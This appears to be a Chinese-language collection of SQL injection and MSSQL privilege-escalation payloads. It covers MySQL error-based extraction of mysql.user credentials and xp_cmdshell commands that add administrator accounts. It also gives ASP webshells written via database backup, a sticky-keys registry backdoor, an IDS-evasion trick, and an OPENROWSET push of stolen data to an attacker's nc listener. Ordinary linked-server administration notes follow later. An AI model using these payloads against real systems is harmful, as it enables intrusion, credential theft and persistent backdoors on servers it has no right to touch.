(1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2),
18446744073709551610, 18446744073709551610);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select
'localhost','root','*','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','
Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','','0','0','0','0','','' from dual limit 1)
<
(1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2)),184467440
73709551610,18446744073709551610))'
需要注意的是该方法并不适用于于老版的Mysql,除此之外你还需要了解错误信息的长度限制,因为这将决定
你可以获取多长的信息:
mysys / my_error.c
/* Max length of a error message. Should be kept in sync with MYSQL_ERRMSG_SIZE. */
#define ERRMSGSIZE (512)
如果对象是MariaDB(Mysql的一个分支),当你尝试上面的方法时,你可能会看到这样的报错信息:
mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610,
18446744073709551610))
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select
#),18446744073709551610,18446744073709551610))'
作为解决方案,可以通过这种方式来解决这个问题:
mysql> SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a;
ERROR 1690 (22003): BIGINT value is out of range in '(('5.5-MariaDB' is not null) - -
(9223372036854775808))'
现在让我们看看能不能让我们的Vector更短一些
//查询数据库版本
SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610,
18446744073709551610))
=
select 1E308*if((select*from(select version())x),2,2)
SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a
=
select if(x,2,2)*1E308 from(select version()x)y
//获取表字段名称
SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from
test.shop limit 1), 18446744073709551610, 18446744073709551610)
=
select 1E308*if((select*from(select*from mysql.user)``limit 1)>(select*from mysql.user limit
1),2,2)
//获取字段值
SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) <
(1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2),
18446744073709551610, 18446744073709551610)
=
select 1E308*if((select*from(select*from mysql.user LIMIT 1)``limit 1)<(select*from
mysql.user limit 0),2,2)
//获取指定字段的值
select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT
1)a limit 1),2,2)
//获取字段个数
select 1E308*if((select*from mysql.user limit 1)>(select 1),2,2)
其它的一些变形
SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a
select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT
1)a limit 1),2,2);
=>
select 2*if((select user|host|password|file_priv from(select*from mysql.user LIMIT 1)a limit
1),1e308,0);
mysql> select (select * from mysql.user)=1;
mysql> select (select * from mysql.user)in(1);
ERROR 1241 (21000): Operand should contain 42 column(s)
select 2*if((select user|host|password|file_priv from(select*from mysql.user LIMIT 1)a limit
1),1e308,0);
select if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a
limit 1),2,2)*1E308
SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a
select (x!=0x00)--9223372036854775808 from(SELECT version()x)y
mysql> select!x-~0.FROM(select+user()x)f;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~
(0))'
3.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.注入参数是字符
'and [查询条件] and ''='
5.搜索时没过滤参数的
'and [查询条件] and '%25'='
6.猜数据库
;and (select Count(*) from [数据库名])>0
7.猜字段
;and (select Count(字段名) from 数据库名)>0
8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多
个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows
\CurrentVersion','CommonFilesDir' 返回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows
\CurrentVersion','TestvalueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows
\CurrentVersion','TestvalueName' 删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,
包括该键下所有值
14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oscrip{过滤}t %>');
backup database model to disk='c:\l.asp';
15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscrip{过滤}t.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';
请求的时候,像这样子用:
http://ip/l.asp?c=dir
================================================================================================
================================================================================================
================================================================================================
================================================================================================
============================
取得所有数据库名 包括系统数据库
–SELECT name FROM master.dbo.sysdatabases
–
取得所有非系统数据库名
–select [name] from master.dbo.sysdatabases where DBId>6 Order By [Name]
–
取所有信息,包括数据库文件地址
–select * from master.dbo.sysdatabases where DBId>6 Order By
[Name]
该条语句查询返回所有的用户表
select * from sysobjects where xtype='u'
查询系统所有数据表信息
select * from sysobjects
查看机器名
select * from sys.servers
列目录
exec master.dbo.xp_subdirs 'c:\’
exec master.dbo.xp_dirtree ‘c:’,1,1 db_owner
权限可以执行
exec master.dbo.xp_dirtree ‘c:/Program Files’,1,1
程序代码,写入webshell
exec master.dbo.xp_subdirs ‘d:\web\www.xx.com’;
exec sp_makewebtask ‘d:
\web\www.XXXX.com\XX.asp’,'select”<%execute(request(“SB”))%>”
execute master..xp_enumgroups
遍历系统用户
execute master..xp_getnetname
获取当前机器名
--列出服务器上固定驱动器,以及每个驱动器的可用空间
//dbo public
execute
xp_ntsec_enumdomains
--
创建个登陆mssql的帐号
exec master.dbo.sp_addlogin name,pass;--
--
列出服务器域名
xp_ntsec_enumdomains //
机器名 //dbo public
--
停止或者启动某个服务
xp_servicecontrol 'stop','schedule' //schedule是服务得名称 //dbo
--用pid来
停止某个执行中的程序
xp_terminate_process 123 //123是pid //dbo
--
只列某个目录下的子目录
dbo.xp_subdirs 'C:' //dbo
sql server
2005下开启xp_cmdshell的办法
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC
sp_configure 'xp_cmdshell', 1;RECONFIGURE;
SQL2005开启'OPENROWSET'
支持的方法:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc
Distributed Queries',1;RECONFIGURE;
SQL2005开启'sp_oacreate'支持的方法:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec
sp_configure 'Ole Automation Procedures',1;RECONFIGURE
sql server 2008下开启xp_cmdshell的方法
-- To allow advanced options to be changed.
EXEC
sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for
advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To
update the currently configured value for this feature.
RECONFIGURE
GO
exec xp_cmdshell 'ipconfig'
今天想到修改下数据库服务器的sa登陆密码,可突然忘记了,只好借助其他账户打开查询分析器修改sa的密码
了,很简单:
执行:
sp_password Null,'teracypwd,'sa'
把SA的密码设为“teracypwd”
执行成功后
有“Command(s) completed successfully.” OK!
在db权限并且分离获取mssql数据库服务器ip的方法
1.本地nc监听 nc -vvlp 80
2.;insert into
OPENROWSET('SQLOLEDB','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;', 'select * from
dest_table') select * from src_table;--
select * from openrowset
('sqloledb','server=125.110.145.130,6789;uid=sa;pwd=zhu','select user;')
数据库导入导出
/*不同服务器数据库之间的数据操作*/
--创建链接服务器
exec sp_addlinkedserver
'ITSV ', ' ', 'SQLOLEDB ', '远程服务器名或ip地址 '
exec sp_addlinkedsrvlogin 'ITSV ', 'false
',null, '用户名 ', '密码 '
--查询示例
select * from ITSV.数据库名.dbo.表名
--导入示例
select *
into 表 from ITSV.数据库名.dbo.表名
--以后不再使用时删除链接服务器
exec sp_dropserver 'ITSV ',
'droplogins '
--
连接远程/局域网数据(openrowset/openquery/opendatasource)
--1、openrowset
--查询示例
select *
from openrowset( 'SQLOLEDB ', 'sql服务器名 '; '用户名 '; '密码 ',数据库名.dbo.表名)
--
生成本地表
select * into 表 from openrowset( 'SQLOLEDB ', 'sql服务器名 '; '用户名 '; '密码 ',数
据库名.dbo.表名)
--
把本地表导入远程表
insert openrowset( 'SQLOLEDB ', 'sql服务器名 '; '用户名 '; '密码 ',数据库
名.dbo.表名)
select *from 本地表
--
更新本地表
update b
set b.列A=a.列A
from openrowset( 'SQLOLEDB ', 'sql服务器名 '; '用户名 '; '
密码 ',数据库名.dbo.表名)as a inner join 本地表 b
on a.column1=b.column1
--openquery
用法需要创建一个连接
--首先创建一个连接创建链接服务器
exec sp_addlinkedserver 'ITSV ', ' ',
'SQLOLEDB ', '远程服务器名或ip地址 '
--查询
select *
FROM openquery(ITSV, 'SELECT * FROM 数据
库.dbo.表名 ')
--
把本地表导入远程表
insert openquery(ITSV, 'SELECT * FROM 数据库.dbo.表名 ')
select * from 本地
表
--更新本地表
update b
set b.列B=a.列B
FROM openquery(ITSV, 'SELECT * FROM 数据库.dbo.表名 ')
as a
inner join 本地表 b on a.列A=b.列A
--3、opendatasource/openrowset
SELECT *
FROM
opendatasource( 'SQLOLEDB ', 'Data Source=ip/ServerName;User ID=登陆名;Password=密码 '
).test.dbo.roy_ta
--
把本地表导入远程表
xp_cmdshell的删除及恢复
恢复xp_cmdshell的方法
删除扩展存储过过程xp_cmdshell
的语句
exec sp_dropextendedproc ’xp_cmdshell’
恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’
exec
master.dbo.addextendedproc ’xp_cmdshell’,’xplog70.dll’;select count(*) from
master.dbo.sysobjects where xtype=’x’ and
返回结果为1就ok
否则需上传c:\inetput\web
\xplog70.dll后
exec master.dbo.sp_addextendedproc ’xp_cmdshell’,’c:\inetput\web\xplog70.dll
’;--
如果是用以下方法删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec
sp_dropextendedproc ’xp_cmdshell’
则可以用以下语句恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc
addextendedproc ("xp_cmdshell","xplog70.dll")
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
1、
用xp_cmdshell:
exec master.dbo.xp_cmdshell "net user admin admin /add"
exec
master.dbo.xp_cmdshell "net localgroup administrators admin /add"
无xp_cmdshell情况下,用sp_oacreate跟sp_oamethod:
declare @object int
exec
sp_oacreate 'wscrip{过滤}t.Shell',@object out
exec sp_oamethod
@object,'Run',NULL,'net user admin admin /add'
exec sp_oamethod @object,'Run',NULL,'net
localgroup Administrators admin /add'
注:regsvr32 /s c:\windows\system32\wshom.ocx
启动wscrip{过滤}t.shell
3、
用sp_oacreate跟FSO
declare @o int
exec sp_oacreate
'scrip{过滤}ting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows
\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @oo int
exec
sp_oacreate 'scrip{过滤}ting.filesystemobject', @oo out
exec sp_oamethod @oo,
'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
用xp_regwrite (db_owner,需重启):
exec master.dbo.xp_regwrite
'hkey_local_machine','software\microsoft\windows\currentversion\
run','eadd1','reg_sz','net user admin admin /add'
exec master.dbo.xp_regwrite
'hkey_local_machine','software\microsoft\windows\currentversion\
run','eadd2','reg_sz','net localgroup administrators admin /add'
5、用sp_add_job:
exec
master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
use msdb exec sp_delete_job
null,'x'
exec sp_add_job 'x'
exec sp_add_jobstep
Null,'x',Null,'1','CMDEXEC','cmd /c net user admin admin /add'
exec sp_add_jobserver
Null,'x',@@servername exec sp_start_job 'x'
很多人SA直接用沙盒模式成功了好多机器,但我从来没实践过,也不太清楚成功率如何。当扩展被删除时,先
恢复对注册表的读写存储。
dbcc addextendedproc ('xp_regread','xpstar.dll')
dbcc addextendedproc
('xp_regwrite','xpstar.dll')
修复沙盒的保护模式
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet
\4.0\Engines','SandBoxMode','REG_DWORD',0;--
查看'SandBoxMode'值是否已经变成0了。
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE
\Microsoft\Jet\4.0\Engines', 'SandBoxMode'
最后调用沙盒模式
select * from openrowset('microsoft.jet.oledb.4.0',';database=C:\WINDOWS
\system32\ias\dnary.mdb','select shell("cmd.exe /c net user user passwd /add")')
如果沙盒保护模式未“关闭”,会报错:
服务器: 消息 7357,级别 16,状态 2,行 1
未能处理对象 'select shell("cmd.exe /c net user user passwd /add")'。OLE DB 提供程
序'microsoft.jet.oledb.4.0' 指出该对象中没有任何列。
OLE DB 错误跟踪[Non-interface error: OLE DB provider unable to process object, since the object
has nocolumnsProviderName='microsoft.jet.oledb.4.0', Query=select shell("cmd.exe /c net user
user passwd /add")']。
2、
如果.mdb不存在或是输入路径错误
服务器: 消息 7399,级别 16,状态 1,行 1
OLE DB 提供程序 'microsoft.jet.oledb.4.0' 报错。
[OLE/DB provider returned message:
找不到文件 'C:\WINDOWS\system32\ias\dnary1.mdb'。]
OLE DB 错误跟踪[OLE/DB Provider 'microsoft.jet.oledb.4.0' IDBInitialize::Initialize returned
0x80004005: ]。
3、如果输入过程中多了一些空格,也会报错。尤其要注意这点,很多人直接网上找文章复
制粘贴进去执行。
服务器: 消息 7357,级别 16,状态 2,行 1
未能处理对象 'select
shell("cmd.exe /c net user user passwd /add")'。
OLE DB 提供程序'microsoft.jet.oledb.4.0' 指出该对象中没有任何列。
OLE DB 错误跟踪[Non-interface error:
OLE DB provider unable to process object, since the object has
nocolumnsProviderName='microsoft.jet.oledb.4.0', Query=select shell("cmd.exe /c net user user
passwd /add")']。
4、
如果mdb权限和cmd.exe权限不对,同样会也出现问题。
当mdb权限不对时,
服务器: 消
息 7320,级别 16,状态 2,行 1
未能对
OLE DB 提供程序 'Microsoft.Jet.OLEDB.4.0' 执行查询。
[OLE/DB provider returned
message: 未知]
OLE DB 错误跟踪[OLE/DB Provider 'Microsoft.Jet.OLEDB.4.0'
ICommandText::Execute returned 0x80040e14]。
5、如果net权限不对时,却没有任何提示。
最终的提权办法就是在当前的web目录下面上传系统的ias.mdb和cmd.exe,net.exe三个文件。
执行select * from openrowset('microsoft.jet.oledb.4.0',';database=E:\web\ias.mdb','select shell
("E:\web\cmd.exe /c E:\web\net.exe user user passwd /add")')
成功增加一个计算机用户。
拆分cmdshell绕过IDS
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'ipconfig'
declare
@a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
编辑注册表劫持shift
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT
\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows
\system32\cmd.exe on';--
查询linkserver
select
srvid,srvstatus,srvname,srvproduct,providername,datasource,locatio{过滤}n,schemadate,catalog,srvnetnam
e,isremote,rpc,dataaccess from master.dbo.sysservers
select
srvid,srvstatus,srvname,srvproduct,providername,datasource,locatio{过滤}n,schemadate,catalog,srvnetnam
e,isremote,rpc,dataaccess from master.dbo.sysservers
查询linkserver2
select distinct hostname,db_name(dbid),net_address,loginame,program_name from
master..sysprocesses
查询linkserver
等登录用户
select * from [192.168.1.1].master.dbo.syslogins
查询linkserver上的
所有数据库
select * from linkedSrvWeb.master.dbo.sysdatabases
在linkserver上执行扩展存储
exec [ip].master.dbo.xp_cmdshell
在linkserver上查询所有的表
select * from [ip].master.dbo.sysobjects
select * from openrowset
('sqloledb','server=IP;uid=用户;pwd=密码','select @@version')
select * from openquery([LINKSERVER
名称],'select @@version')
select * from openquery(NDOORS,'select IS_SRVROLEMEMBER(''sysadmin'')')
select * from openquery(GM_SERVER,'select * from sysobjects where xtype = (''U'')')
select * from
openquery(NDOORS,'Select IS_MEMBER(''db_owner'')')
select * from openquery(toatdeweb,'select
srvname from master.dbo.sysservers')
insert into opendatasource
('sqloledb','server=222.241.95.12;uid=scd;pwd=a123520;database=hack520').hack520.dbo.zhu select
name from master.dbo.sysdatabases
create database hack520 Create TABLE zhu(name nvarchar(256)
null);Create TABLE J8(id int NULL,name nvarchar(256) null);
select * from openquery
(toatdeweb,'set fmtonly off exec master.dbo.xp_cmdshell ''net user''')
exec master..xp_dirtree
'c:\',1,1
执行查询目录
exec links.master..xp_cmdshell 'ipconfig'
select * from openquery(toatdeweb,'set
fmtonly off exec master.dbo.xp_cmdshell ''ipconfig /all''')
连接mysql Select * from Mem_DB.UserDB.dbo.AdminList
EXEC MASTER..XP_dirtree 'c:\',1,1
Exec
master.dbo.xp_cmdshell 'dir '
select count(*) from [表明]
查询当前表有多少数据
select distinct hostname,db_name(dbid),net_address,loginame,program_name
from master..sysprocesses
select * from gamedb01.Server01.dbo.cabal_character_table where name='
猪'
你删除的时候显示:数据库正在被使用,无法删除。
点击要删除的数据库,打开事件查看器。
输入:
use
master
go
然后输入以下内容:
declare @d varchar(8000)
set @d= ' '
select @d=@d+ ' kill
'+cast(spid as varchar)+char(13)
from master..sysprocesses where dbid=db_id( '库名 ')
exec(@d)
--
用代码先删除连接此数据库的进程
mssql通过linkserver操作oracle
1)在SQL_SERVER 2005服务器上安装Oracle
9i的客户端。假设安装到C:\ora92i\ 目录。如果D:是NTFS分区,需要将ORACLE安装后的目录设为所使用的用
户有权可运行、可添加、可删除。
2)
配置C:\ora92i\network\ADMIN\tnsnames.ora 文件。(以下红色文字是一个配置范例)
ORCL=
(DEscrip{过滤}tION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.0.11)(PORT= 1521))
)
(CONNECT_DATA =
(SERVICE_NAME = orcl)
)
)
3)
在DOS模式下运行以下命令以便确认ORACLE客户端安装无误。
sqlplus user/password@ORCL
4)
打开开始-控制面板-服务,确认Distributed Transaction Coordinator服务已启动。
5)打开SQL SERVER Management Studio,实例名称(ORCL)-服务器对象(右键)-新建连接服务器。
1.
链接服务器:写上链接服务器的名字,如:OracleTest
2.
服务器类型,选择其他数据源
3. 访问接口:
选择Oracle Provider for OLE DB
4. 产品名称:写上Oracle
5. 数据源:写上
tnsnames.ora文件中配置的服务名,如:ORCL
6.
访问接口字符串:userid=sys as sysdba;password=password
7.
在选择安全性选项页,使用此安装上下文建立连接:
a) 远程登录:user(其他用户,非sys)
b)
使用密码:password
8. 本地登录上设置“NT AUTHORITY\SYSTEM”,远程用户sys,设置密码
9.
确定
6)SQL的写法有两种
a) 使用T-SQL语法:
SELECT * FROM
OraTest.ERP.BAS_ITEM_CLASS
注意在,SQL查询分析器中输入SQL语句时注意中文的全角半角切换
方式!
b) 使用PLSQL语法:
SELECT * FROM openquery(OraTest,'SELECT * FROM
OraTest.ERP.BAS_ITEM_CLASS ')
c)第二种访问方式比第一种约快50%;第二种访问方式跟直连
ORACLE的速度相当;第一种访问方式可能会导致一些意外错误,如:
该表不存在,或者当前用户
没有访问该表的权限等等一些信息。
d)如果需要访问的column中使用没有精度的数据类型,这两
种查询方式都可能会报错,这是ORACLE的BUG,无法修正,只能通过查询语句的特殊处理规避这一问题:
OLE DB 提供程序 'OraOLEDB.Oracle' 为列提供的元数据不一致。执行时更改了元数据信息。
mssql添加
删除用户,并赋予权限
use 你的库名
go
--新增用户
exec sp_addlogin 'test' --添加登录
exec
sp_grantdbaccess N'test' --使其成为当前数据库的合法用户
exec sp_addrolemember N'db_owner',
N'test' --授予对自己数据库的所有权限
--这样创建的用户就只能访问自己的数据库,及数据库中包含了
guest用户的公共表
go
--删除测试用户
exec sp_revokedbaccess N'test' --移除对数据库的访问权
限
exec sp_droplogin N'test' --删除登录
如果在企业管理器中创建的话,就用:
企业管理器--安全
性--右键登录--新建登录
常规项
--名称中输入用户名
--身份验证方式根据你的需要选择(如果是使用windows身份验证,则要先在操作系统的用户中新建用户)
--默认设置中,选择你新建的用户要访问的数据库名
服务器角色项
这个里面不要选择任何东西
数据库
访问项
勾选你创建的用户需要访问的数据库名
数据库角色中允许,勾选"public","db_ownew"
确定,这
样建好的用户与上面语句建立的用户一样
最后一步,为具体的用户设置具体的访问权限,这个可以参考下面的最简示例:
--添加只允许访问指定表的用户:
exec sp_addlogin '用户名','密码','默认数据库名'
--添加到数据库
exec sp_grantdbaccess '用户名'
--分配整表权限
GRANT SELECT , INSERT , UPDATE , DELETE ON table1 TO [用户名]
--分配权限到具体的列
GRANT SELECT , UPDATE ON table1(id,AA) TO [用户名]
至于具体的安全设置和理论知道,参考SQL联机帮助
固定数据库角色 描述
db_owner 在数据库中有全部权限。
db_accessadmin 可以添加或删除用户 ID。
db_securityadmin 可以管理全部权限、对象所有权、角色和角色成员资格。
db_ddladmin 可以发出 ALL DDL,但不能发出 GRANT、REVOKE 或 DENY 语句。
db_backupoperator 可以发出 DBCC、CHECKPOINT 和 BACKUP 语句。
db_datareader 可以选择数据库内任何用户表中的所有数据。
db_datawriter 可以更改数据库内任何用户表中的所有数据。
db_denydatareader 不能选择数据库内任何用户表中的任何数据。
db_denydatawriter 不能更改数据库内任何用户表中的任何数据。
你应该选择db_datareader,db_datawriter,db_accessadmin
5.
在SQL Server实例以单用户模式启动后,Windows管理员帐号就能使用sqlcmd工具在Windows验证模式下连接
SQL Server。您可以使用T-SQL命令诸如“sp_addsrvrolemember”来在sysadmin服务器角色中添加现有登录帐
号或新创建一个登录帐号。
范例语句如下:
EXEC sp_addsrvrolemember 'CONTOSO\Buck', 'sysadmin';
GO
增加一个sysadmin权限的用户
(1)管理服务器角色
在SQL Server中,实现SQL Server角色管理的存储过程主要有两个:
sp_addsrvrolemember
和sp_dropsrvrolemember
sp_addsrvrolemember
可以将某一登录帐号加入到服务器角色中,使其成为该服务器角色的成员。语法如下:
sp_addsrvrolemember
login , role
sp_dropsrvrolemember
可以将某一登录帐号从某一服务器角色中删除,当该成员从服务器角色中被删除后,便不再具有该服务器角色
所设置的权限。语法如下:
sp_dropsrvrolemember [@loginname=]'login',[@rolename=]'role'
其中
@loginname为登录者名称;@rolename为服务器角色。
(2)管理数据库角色
在SQL Server中,支持数据库管理的
存储过程主要有六种,其具体含义和语法如下:
sp_addrole:用于创建一个新的数据库角色;
sp_addrole
role, owner
sp_droprole:用于从当前数据库角色中删除一个数据库角色;
sp_droprole role
sp_helprole:
用于显示当前数据库中所有数据库角色的全部信息;
sp_helprole ['role']
sp_addrolemember:用于向数据库
某一角色中添加数据库用户,这些角色可以是用户自定义的标准角色,也可以是固定的数据库角色,但不能是
应用程序角色。
sp_addrolemember role, security_account
sp_droprolemember:用于删除某一角色的用
户;
sp_droprolemember role, security_account
sp_helprolemember:用于显示某一数据库角色的所有成员
。
sp_helprolemember ['role']
MSSQL LINKSERVER 查询
----------------------------------------------------------------------------------
-- Author :
htl258(Tony)
-- Date : 2010-06-25 22:23:18
-- Version: Microsoft SQL Server 2008 (RTM) -
10.0.1600.22 (Intel X86)
-- Jul 9 2008 14:43:34
-- Copyright (c) 1988-2008 Microsoft Corporation
--
Developer Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
-- Blog : -- Subject:
SQL不同服务器数据库之间数据操作整理
----------------------------------------------------------------------------------
--1.
创建链接服务器
--1.1 创建一个链接名
EXEC sp_addlinkedserver 'LinkName','','SQLOLEDB','远程服务器名
或ip地址' --
有自定义实例名还要加上"\实例名"
/*例如:EXEC sp_addlinkedserver
'TonyLink','','SQLOLEDB','192.168.58.208' */
--1.2
创建登录信息(或叫创建链接服务器登录名映射)(只需选择一种方式)
--1.2.1
以windows认证的方式登录
EXEC sp_addlinkedsrvlogin 'LinkName'
--或EXEC sp_addlinkedsrvlogin 'LinkName','true'
/*例如:EXEC sp_addlinkedsrvlogin 'TonyLink' */
--1.2.2
以SQL认证的方式登录
EXEC sp_addlinkedsrvlogin 'LinkName','false',NULL,'用户名','密码'
/*例如:EXEC
sp_addlinkedsrvlogin 'TonyLink','false',null,'sa','123' */
--2.
链接服务器相关数据操作
--2.1 查询示例
SELECT * FROM LinkName.数据库名.架构名.表名
/*例如:SELECT *
FROM TonyLink.Mydb.dbo.tb */
--
2.2 导入示例
SELECT * INTO 表名 FROM LinkName.数据库名.架构名.表名
/*例如:SELECT * INTO Newtb
FROM TonyLink.Mydb.dbo.tb */
--
2.3 更新示例
UPDATE LinkName.数据库名.架构名.表名 SET 字段='值' WHERE 字段='条件'
/*例如:UPDATE
TonyLink.Mydb.dbo.tb SET Persons='g' WHERE Persons='a' */
--
2.4 删除示例
DELETE LinkName.数据库名.架构名.表名 WHERE 字段名='条件'
/*例如:DELETE
TonyLink.Mydb.dbo.tb WHERE Persons='g' */
--3通过行集函数(OPENQUERY/OPENROWSET/OPENDATASOURCE)操
作方法
-
3.1 OPENQUERY 方法(需要借助刚创建的链接服务器):
--
3.1.1 查询示例
SELECT * FROM OPENQUERY(LinkName,'SELECT * FROM 数据库名.架构名.表名')
/*
例如:SELECT * FROM OPENQUERY(TonyLink,'SELECT * FROM Mydb.dbo.tb') */
--
3.1.2 导入示例
--3.1.2.1 导入所有列
INSERT OPENQUERY(LinkName, 'SELECT * FROM 数据库名.架构名.表名
') SELECT * FROM 本地表
/* 例如:INSERT OPENQUERY(TonyLink,'SELECT * FROM Mydb.dbo.tb') SELECT *
FROM tb */
--3.1.2.2
导入指定列
INSERT OPENQUERY(LinkName, 'SELECT * FROM 数据库名.架构名.表名') (列,列...)
SELECT 列,
列... FROM 本地表
/*
例如:INSERT OPENQUERY(TonyLink,'SELECT * FROM Mydb.dbo.tb')(RANGE,LEVEL,Persons)
SELECT
RANGE,LEVEL,Persons FROM tb
*/
--3.1.3
更新示例
UPDATE OPENQUERY(LinkName, 'SELECT * FROM 数据库名.架构名.表名') SET 字段='值' WHERE 字
段='条件'
/*例如:UPDATE OPENQUERY(TonyLink, 'SELECT * FROM Mydb.dbo.tb') SET Persons='g' WHERE
Persons='a' */
--3.1.4
删除示例
DELETE OPENQUERY(LinkName, 'SELECT * FROM 数据库名.架构名.表名') WHERE 字段名='条件'
/*例
如:DELETE OPENQUERY(TonyLink, 'SELECT * FROM Mydb.dbo.tb') WHERE Persons='g' */
--3.2
OPENROWSET方法(不需要用到创建好的链接名。如果连接的实例名不是默认的,需要在"sql服务器名或IP地址"
后加上"\实例名")
--3.2.1 查询示例
--3.2.1.1
Windows认证方式查询(以下方法之一即可)
SELECT * FROM OPENROWSET('SQLOLEDB', 'server=sql服务器名或
IP地址;Trusted_Connection=yes',数据库名.架构名.表名)
SELECT * FROM OPENROWSET('SQLNCLI',
'server=sql服务器名或IP地址;Trusted_Connection=yes',数据库名.架构名.表名)
SELECT * FROM
OPENROWSET('SQLOLEDB', 'server=sql服务器名或IP地址;Trusted_Connection=yes','SELECT * FROM 数据库
名.架构名.表名')
